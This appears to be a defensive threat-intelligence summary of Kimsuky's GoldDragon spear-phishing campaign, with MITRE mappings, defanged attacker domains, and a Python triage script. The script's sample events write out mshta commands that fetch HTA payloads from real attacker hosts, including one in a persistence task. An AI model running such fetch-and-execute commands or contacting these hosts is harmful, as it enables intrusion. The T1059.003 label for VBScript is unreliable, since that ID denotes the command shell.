Kimsuky’s GoldDragon cluster is a multi-stage operation targeting Korea-related entities, evolving rapidly with new infection chains and a layered C2 network. The campaign starts with spear-phishing and uses HTML Application (HTA), VBScript, and mshta to fetch payloads, exfiltrate data, and establish persistence.
#Kimsuky #GoldDragon
Keypoints
- Kimsuky’s GoldDragon cluster demonstrates a multi-stage infection chain beginning with spear-phishing and a macro-embedded Word document.
- Initial infection leads to VBScript delivery, with the actor abusing legitimate hosting services to host malicious scripts encoded for delivery.
- The campaign relies on HTML Application (HTA) and mshta.exe to execute fetched payloads, enabling staged execution.
- Multiple C2 stages are used, with IP validation and OS/user-agent checks to control payload delivery and target suitability.
- Persistence is achieved via a scheduled task named “OneDrive Clean,” downloaded via s.php and registered on the victim’s system.
- Decoy documents and geopolitically themed content are used to entice targets (politics, diplomacy, think tanks, etc.).
- Threat actors use obfuscation, encoded content, and legitimate hosting/blog services to hide infrastructure and reduce exposure.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The actor initiated the infection chain by sending a spear-phishing email containing a macro-embedded Word document. “the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document.”
- [T1059.003] Windows Script – A Visual Basic Script was delivered to the victim. “a Visual Basic Script was delivered to the victim.”
- [T1218.002] Signed Binary Proxy Execution: Mshta – The macro executes a fetched payload with the mshta.exe process that is designed to execute a Microsoft HTML Application. “the macro executes a fetched payload with the mshta.exe process that is designed to execute a Microsoft HTML Application.”
- [T1218.005] HTA – HTML Application (HTA) payloads are used for reporting victim information and creating a scheduled task. “The HTA payload has two main goals: reporting the victim information to the C2 server and creating a scheduled task for auto-execution.”
- [T1105] Ingress Tool Transfer – The fetched script downloads an additional payload from the C2 infrastructure. “The fetched script downloads an additional payload and registers it…”
- [T1082] System Information Discovery – The HTA/VBS activities collect system information and send it to the C2. “The sent data contains the ProgramFiles folder path, antivirus name, recently opened file list, user name, OS name, OS version…”
- [T1056.001] Keylogging – The final payload can capture keystrokes and other sensitive data, including “stored web browser login credentials”, and exfiltrates them to the C2.
Indicators of Compromise
- [Domains] Malicious hosting domains – attach.42web[.]io, attachment.a0001[.]net, bigfile[.]totalh[.]net, clouds[.]rf[.]gd, global[.]onedriver[.]epizy[.]com, global.web1337[.]net
- [Domains] C2 and infrastructure domains – leehr36[.]mypressonline[.]com/h[.]php, leehr24[.]mywebcommunity[.]org/h[.]php, weworld59[.]myartsonline[.]com/h[.]php
- [Domains] Additional C2 or hosting domains – weworld78[.]atwebpages[.]com/info[.]php?ki87ujhy=, weworld78[.]atwebpages[.]com/s[.]php, weworld78[.]atwebpages[.]com/hta[.]php
- [Domains] Blogspot/blog URLs used for deception – 225b4d3c305f43e1a590[.]blogspot[.]com/2022/01/1.html, 3a8f846675194d779198[.]blogspot[.]com/2021/10/1.html
- [File Names] Delivered and decoy documents – CV.DHOM Alexandra Siddall (Korean).doc, 2022년AL(220412).doc, [양식]사례비지급의뢰서.doc
- [URLs] Redirect and tracking destinations – mail.google.com as a redirect target in error paths (as seen in the index/h.php flows)
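As an added detection example (not code from the Securelist report or from the actor's tooling), the following Python triage rules flag the two behaviours described above: mshta.exe fetching an HTA over HTTP from a macro document, and a scheduled task named “OneDrive Clean” whose action re-fetches a remote payload, cross-checked against the hostnames in the IoC list. The event records and their field names are constructed to resemble normalised Sysmon telemetry and are assumptions, not a real log schema.

```python
import re

# Constructed sample telemetry (not taken from the report): normalised Sysmon-style
# process-creation records plus one scheduled-task creation record.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta.exe "http://weworld78.atwebpages.com/hta.php"',
     "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"},
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Temp\installer.hta", "parent": r"C:\Windows\explorer.exe"},
    {"type": "task", "name": "OneDrive Clean",
     "action": "mshta.exe http://weworld78.atwebpages.com/s.php"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "parent": r"C:\Windows\explorer.exe"},
]
# Hostnames from the IoC list above, with the [.] defanging removed so they match URLs.
IOC_DOMAINS = {"weworld78.atwebpages.com", "leehr36.mypressonline.com",
               "leehr24.mywebcommunity.org", "weworld59.myartsonline.com",
               "attach.42web.io", "global.web1337.net"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")

def ioc_hits(text):
    """Return the IoC hostnames referenced by any URL in the text."""
    return {h.lower() for h in URL_RE.findall(text) if h.lower() in IOC_DOMAINS}

def check_event(ev):
    """Return the rule names this event triggers (empty list means benign)."""
    rules = []
    if ev["type"] == "process":
        is_mshta = ev["image"].lower().endswith("\\mshta.exe")
        if is_mshta and URL_RE.search(ev["cmdline"]):
            rules.append("mshta_remote_hta")       # HTA fetched over HTTP (T1218.005)
        if is_mshta and ev["parent"].lower().endswith(OFFICE_PARENTS):
            rules.append("office_spawned_mshta")   # macro document launching mshta
        text = ev["cmdline"]
    else:
        if ev["name"].strip().lower() == "onedrive clean":
            rules.append("golddragon_task_name")   # task name given in the report
        if "mshta" in ev["action"].lower() and URL_RE.search(ev["action"]):
            rules.append("task_runs_remote_hta")   # persistence re-fetching the payload
        text = ev["action"]
    if ioc_hits(text):
        rules.append("known_ioc_domain")
    return rules

def triage(events):
    """Map event index to triggered rules, dropping events that trigger none."""
    return {i: r for i, ev in enumerate(events) if (r := check_event(ev))}
```

The local-file mshta launch in the sample is deliberately not flagged on its own; it only becomes an alert when paired with an Office parent or an IoC hostname, which keeps the rules focused on the fetch-and-execute pattern the report describes.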
Read more: https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/